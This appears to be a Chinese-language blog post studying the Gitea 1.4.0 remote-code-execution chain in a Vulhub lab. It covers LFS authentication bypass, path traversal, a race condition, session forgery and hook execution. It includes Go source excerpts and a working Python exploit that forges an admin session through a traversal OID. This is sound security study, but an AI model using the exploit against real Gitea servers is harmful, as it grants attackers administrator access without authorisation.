Go代码审计学习(二)

已于 2022-12-12 19:36:59 修改
阅读量786 收藏
点赞数
分类专栏: Go学习笔记 文章标签: golang 安全
于 2022-12-12 19:25:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/128291872
版权

文章目录

环境搭建

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。
1.4.0版本中有一处逻辑错误,导致未授权用户可以目录穿越、读写文件、最终导致执行命令。

访问 127.0.0.1:3000
请添加图片描述
请添加图片描述
添加管理员的账号密码,其他选项默认就行,点击安装

添加新仓库
请添加图片描述
请添加图片描述
需要重启一次服务,P神博客里说是因为第一次的时候session并不是保存在文件中,而是内存中,所以需要重启一次

docker-compose restart

漏洞一:代码逻辑错误、没有做有效的鉴权

Modules/lfs/server.go

// post请求处理函数
func PostHandler(ctx *context.Context) {
	if !setting.LFS.StartServer {
	}
	if !MetaMatcher(ctx.Req) {
	}
	rv := unpack(ctx)

	repository, err := models.GetRepositoryByOwnerAndName(rv.User, rv.Repo)

  // 关键错误逻辑,检查仓库权限
	if !authenticate(ctx, repository, rv.Authorization, true) {
		requireAuth(ctx)
	}

	meta, err := models.NewLFSMetaObject(&models.LFSMetaObject{Oid: rv.Oid, Size: rv.Size, RepositoryID: repository.ID})

	ctx.Resp.Header().Set("Content-Type", metaMediaType)
	sentStatus := 202
	contentStore := &ContentStore{BasePath: setting.LFS.ContentPath}
	ctx.Resp.WriteHeader(sentStatus)
}

// 鉴权函数
func authenticate(ctx *context.Context, repository *models.Repository, authorization string, requireWrite bool) bool {
	accessMode := models.AccessModeRead
  
  // 检查是不是私人仓库,requireWrite 默认是 true
	if !repository.IsPrivate && !requireWrite {
		return true
	}
  
  // 检查
	if ctx.IsSigned {
		accessCheck, _ := models.HasAccess(ctx.User.ID, repository, accessMode)
		return accessCheck
	}

	user, repo, opStr, err := parseToken(authorization)
	ctx.User = user
	if opStr == "basic" {
		accessCheck, _ := models.HasAccess(ctx.User.ID, repository, accessMode)
		return accessCheck
	}
	return false
}

// 鉴权失败
// 发现了吧,就算没有权限也只是简单的设置了一下 header和状态码,然后继续执行 post下面的代码
func requireAuth(ctx *context.Context) {
	ctx.Resp.Header().Set("WWW-Authenticate", "Basic realm=gitea-lfs")
	writeStatus(ctx, 401)
}

所以这个漏洞允许未授权的用户为任意的仓库创建 GIT LFS对象

漏洞二:目录穿越、任意文件读取

上面这个漏洞虽然可以创建 LFS对象,但是在读取这个对象代表的文件接口处却没有越权

所以要操作读取,必须要通过一个公开的仓库作为跳板,好在这里可以目录穿越,所以还是完整的

漏洞成因:使用 go-macaron作为WEB框架,其中session插件并没有对session ID 过滤,导致可以目录穿越任意文件

// get请求处理函数
func getMetaHandler(ctx *context.Context) {
	rv := unpack(ctx)
	meta, _ := getAuthenticatedRepoAndMeta(ctx, rv, false)
  
	ctx.Resp.Header().Set("Content-Type", metaMediaType)

	if ctx.Req.Method == "GET" {
		enc := json.NewEncoder(ctx.Resp)
		enc.Encode(Represent(rv, meta, true, false))
	}
	logRequest(ctx.Req, 200)
}

//鉴权函数
func getAuthenticatedRepoAndMeta(ctx *context.Context, rv *RequestVars, requireWrite bool) (*models.LFSMetaObject, *models.Repository) {
	repository, err := models.GetRepositoryByOwnerAndName(rv.User, rv.Repo)

  // 鉴权失败直接 return,和post处不同
	if !authenticate(ctx, repository, rv.Authorization, requireWrite) {
		requireAuth(ctx)
		return nil, nil
	}

	meta, err := repository.GetLFSMetaObjectByOid(rv.Oid)
	return meta, repository
}

func (s *ContentStore) Get(meta *models.LFSMetaObject, fromByte int64) (io.ReadCloser, error) {
	// 直接拼接 OID,所以可以../../目录穿越
  path := filepath.Join(s.BasePath, transformKey(meta.Oid))
	// 读取文件
	f, err := os.Open(path)
	if fromByte > 0 {
		_, err = f.Seek(fromByte, os.SEEK_CUR)
	}
	return f, err
}

// 构造路径
func transformKey(key string) string {
	return filepath.Join(key[0:2], key[2:4], key[4:])
}

1、首先需要创建一个 LFS对象
请添加图片描述
2、访问这个 LFS对象
请添加图片描述

漏洞三:条件竞争

func (s *ContentStore) Put(meta *models.LFSMetaObject, r io.Reader) error {
	path := filepath.Join(s.BasePath, transformKey(meta.Oid))
	tmpPath := path + ".tmp"
	// 生成 tmp临时文件
	dir := filepath.Dir(path)
	if err := os.MkdirAll(dir, 0750); err != nil {
		return err
	}
	
	file, err := os.OpenFile(tmpPath, os.O_CREATE|os.O_WRONLY|os.O_EXCL, 0640)
	// defer 函数返回后又删除 tmp临时文件
  // 需要想办法让文件被删除之前就被利用
	defer os.Remove(tmpPath)

	hash := sha256.New()
	hw := io.MultiWriter(hash, file)

	written, err := io.Copy(hw, r)
	file.Close()

	return os.Rename(tmpPath, path)
}

go和PHP又不一样,PHP还可以条件竞争写马然后执行命令,go的话想要写定时任务,但是没有权限

继续看P神的思路,伪造session提升权限

BASE_URL = 'http://your-ip:3000/vulhub/repo'
JWT_SECRET = 'AzDE6jvaOhh_u30cmkbEqmOdl8h34zOyxfqcieuAu9Y'
USER_ID = 1
REPO_ID = 1
// 生成 11vulhub.tmp 文件
SESSION_ID = '11vulhub'
// 这段16进制就是session伪造的数据,{"_old_iod": "1", "uid": uid, "uname": "vulhub" },序列化后再16进制编码
SESSION_DATA = bytes.fromhex('0eff81040102ff82000110011000005cff82000306737472696e670c0a00085f6f6c645f75696406737472696e670c0300013106737472696e670c05000375696405696e7436340402000206737472696e670c070005756e616d6506737472696e670c08000676756c687562')

def generate_token():
    def decode_base64(data):
        missing_padding = len(data) % 4
        if missing_padding != 0:
            data += '='* (4 - missing_padding)
        return base64.urlsafe_b64decode(data)

    nbf = int(time.time())-(60*60*24*1000)
    exp = int(time.time())+(60*60*24*1000)
    token = jwt.encode({'user': USER_ID, 'repo': REPO_ID, 'op': 'upload', 'exp': exp, 'nbf': nbf}, decode_base64(JWT_SECRET), algorithm='HS256')
    return token.decode()

// 数据发送过去,并sleep300秒再删除文件
def gen_data():
    yield SESSION_DATA
    time.sleep(300)
    yield b''

OID = f'....gitea/sessions/{SESSION_ID[0]}/{SESSION_ID[1]}/{SESSION_ID}'
response = requests.post(f'{BASE_URL}.git/info/lfs/objects', headers={
    'Accept': 'application/vnd.git-lfs+json'
}, json={
    "Oid": OID,
    "Size": 100000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
})
response = requests.put(f"{BASE_URL}.git/info/lfs/objects/{quote(OID, safe='')}", data=gen_data(), headers={
    'Accept': 'application/vnd.git-lfs',
    'Content-Type': 'application/vnd.git-lfs',
    'Authorization': f'Bearer {generate_token()}'
 })

漏洞四:钩子函数执行命令

上面的session写进去了的话,我们只需要cookie带上就是管理员权限,i_like_gitea=11vulhub.tmp

/cmd/hook.go

三个钩子函数都一样的,是在执行 git操作时,会被自动被执行的一段代码

请添加图片描述
请添加图片描述

参考链接

GOGS/Gitea利用流程

gitea 远程命令执行漏洞链

cve-2018-18925

cve-2018-18926

paidx0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ladon入侵检测系统GO代码实现
05-14
首先,Go语言(又称Golang)是Google开发的一种静态类型、编译型的编程语言,以其简洁的语法、高效的性能以及并发处理能力而被广泛应用在系统工具和服务器程序开发中。ladon系统选择Go语言作为实现基础,主要是看中...
go代码开发安全指南
HC的博客
07-23 613
目录 1 通用类 I. 代码实现 1.1 内存管理 1.2 文件操作 1.3 系统接口 1.4 通信安全 1.5 敏感数据保护 1.6 加密解密 1.7 正则表达式 2 后台类 I. 代码实现 1.1 输入校验 1.2 SQL操作 1.3 网络请求 1.4 服务器端渲染 1.5 Web跨域 1.6 响应输出 1.7 会话管理 1.8 访问控制 1.9 并发保护 通用类 1. 代码实现类 1.1 内存管理 1.1.1【必须】切片长度校验 在对slice进行操作...
Go代码审计学习(一)
paidx0
12-12 1655
Go代码审计学习(一)
Golang代码审计之XSS、SQL注入漏洞审计及修复
weixin_45945976的博客
06-29 1056
这种情况下存在潜在的XSS漏洞,因为攻击者可以在"message"参数中注入恶意的JavaScript代码,导致该代码在用户的浏览器中执行。在上面的示例中,用户输入的username和password直接被拼接到SQL查询语句中,这种情况下容易受到SQL注入攻击。要修复这个问题,我们可以使用Go语言的html/template包中的自动转义功能,确保任何用户输入都被正确地转义。在修复后的代码中,我们使用了参数化查询,使得用户输入的数据以参数的形式传递给查询语句,而不是直接拼接到字符串中。
golang 代码安全审计
whatday的专栏
01-16 3225
前言 Go语言主要用作服务器端开发语言,适合于很多程序员一起开发大型软件,并且开发周期长,支持云计算的网络服务。Go语言能够让程序员快速开发,并且在软件不断的增长过程中,它能让程序员更容易地进行维护和修改。Go语言是强类型语言,它融合了传统编译型语言的高效性和脚本语言的易用性和富于表达性。 由于Go语言代码审计资料较少,这里就把最近学习的对Vulnerability-goapp项目的审计过程分...
探索GODEL:微软的Go语言代码检查工具
最新发布
gitblog_00055的博客
04-11 574
探索GODEL:微软的Go语言代码检查工具 项目地址:https://gitcode.com/microsoft/GODEL 在软件开发的世界中,保持代码的质量和一致性是至关重要的。这就是为什么微软推出了GODEL——一个专门为Go语言设计的静态代码分析工具。GODEL旨在帮助开发者发现潜在的问题,提高代码质量,并遵循最佳实践。 项目简介 GODEL是一个基于Go语言的工具链扩展,它提供了多种内...
使用Go语言开发的Linux权限审计工具.zip
02-10
总之,“使用Go语言开发的Linux权限审计工具”是一个结合了Go语言优势和Linux系统审计需求的项目,对于学习嵌入式Linux开发和Go语言编程的开发者来说,这是一个极好的实践案例。通过深入理解这个工具的实现,我们...
Go-Go编程语言的安全编码实践指南
08-13
Go语言,又称Golang,是由Google开发的一种静态类型的、编译型的、并发型的、垃圾回收的语言,因其简洁的语法和高效的性能而被广泛应用于后端服务开发、网络编程等领域。本指南将深入探讨Go语言的安全特性,以及如何...
SpringBoot_Study:基于SpringBoot的技术学习代码库〜go go
03-19
SpringBoot_Study是一个专注于SpringBoot技术学习的代码库,它为开发者提供了一个全面了解和实践SpringBoot框架的平台。SpringBoot是由Pivotal团队开发的一个轻量级框架,旨在简化Spring应用的初始搭建以及开发过程...
基于golang的文档管理系统.zip
02-28
- **简单的语法**:Go语言的语法简洁明了,易于学习和阅读,降低了代码维护成本。 2. **文档管理系统核心功能** - **文档存储**:系统应能支持多种格式的文档存储,如PDF、Word、Markdown等,并提供统一的访问...
Go代码审计:Gitea远程命令执行漏洞链
02-24
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,gitobjects和.git文件夹下其实是没有这个文件的,这个文件储存在git服务器上。gitea作为一个git服务器,也提供了LFS功能。在modules/lfs/server.go文件中,PostHandler是POST请求的处理函数:可见,其中间部分包含对权限的检查:在没有权限的情况下,仅执行了requireAuth函数:这个函数做了两件事,一是写入WWW-Authenticate
探索高效代码审计利器:Scorecard Function
gitblog_00060的博客
03-29 410
探索高效代码审计利器:Scorecard Function 项目地址:https://gitcode.com/taenggu0309/Scorecard--Function Scorecard Function 是一个强大的开源项目,旨在帮助开发者和团队自动化代码质量评估,提升软件开发的安全性和可靠性。该项目基于Google的Scorecard 工具,提供了一种简单易用的方式来检测和管理开源项目的...
6.29
网安菜鸡学习笔记
06-29 76
dg-publish: true [CISCN 2023 初赛]go_session [session伪造] 三个路由 r.GET("/", route.Index) r.GET("/admin", route.Admin) r.GET("/flask", route.Flask) 逐个分析 route包里面首先获取了环境变量中的SESSION_KEY func Index(c *gin...
Go代码审计学习笔记
人饭子的博客
10-31 342
Go代码审计 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 环境搭建 推荐 goland 配置远程 debug 调试,参考笔记 goland 远程调试 相关工具 praetorian-inc/gokart - A static analysis tool for securing Go codego install gith...
golang 中使用gorm实现审计字段
lvpeng6的博客
11-12 257
利用gorm的callbacks实现审计字段,如创建、修改订单时自动保存创建人、修改人信息,但又不希望每个结构体中定义SetCreatedBy、SetUpdatedBy方法。
《Python代码审计》(1)一款超好用的代码扫描工具
午夜安全
12-16 2209
从本文开始,我将开始介绍Python源代码审计代码审计是检查源代码中的安全缺陷,检查源代码是否存在安全隐患,或者编码不规范的地方。通常使用自动化工具或者人工审查的方式,自动化工具效率高,但是误报率也高,并且发现的问题不够深入、全面;人工审查的方式可以全面深入的发现源代码中的安全缺陷,缺点是耗时较长。
go语言网络编程之session的实现
august5291的博客
10-27 1036
网络编程中cookie和session是必不可少的,今天就简单说一下go语言对session的实现。 图片来源于网络 cookie,简而言之就是在本地计算机保存一些用户操作的历史信息(当然包括登录信息),并在用户再次访问该站点时浏览器通过HTTP协议将本地cookie内容发送给服务器,从而完成验证,或继续上一步操作。 session在Web开发环境下,它的含义是指一类用来在客户端与服务器端之间保持状态的解决方案。有时候Session也用来指这种解决方案的存储结构。 简而言之,cookie是本
PHP代码审计(全)
sechelper的博客
12-07 3661
PHP代码审计全流程,黑白盒测试,小技巧,实操案例
Go语言学习代码示例详解
Go语言学习代码示例是一系列高清教程,由晨笛整理并分享于2013年3月20日,旨在帮助初学者和进阶者理解并掌握Go语言的关键特性。Go语言是一款由Google开发的开源编程语言,它被设计成简单、快速且能生成可靠的软件。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值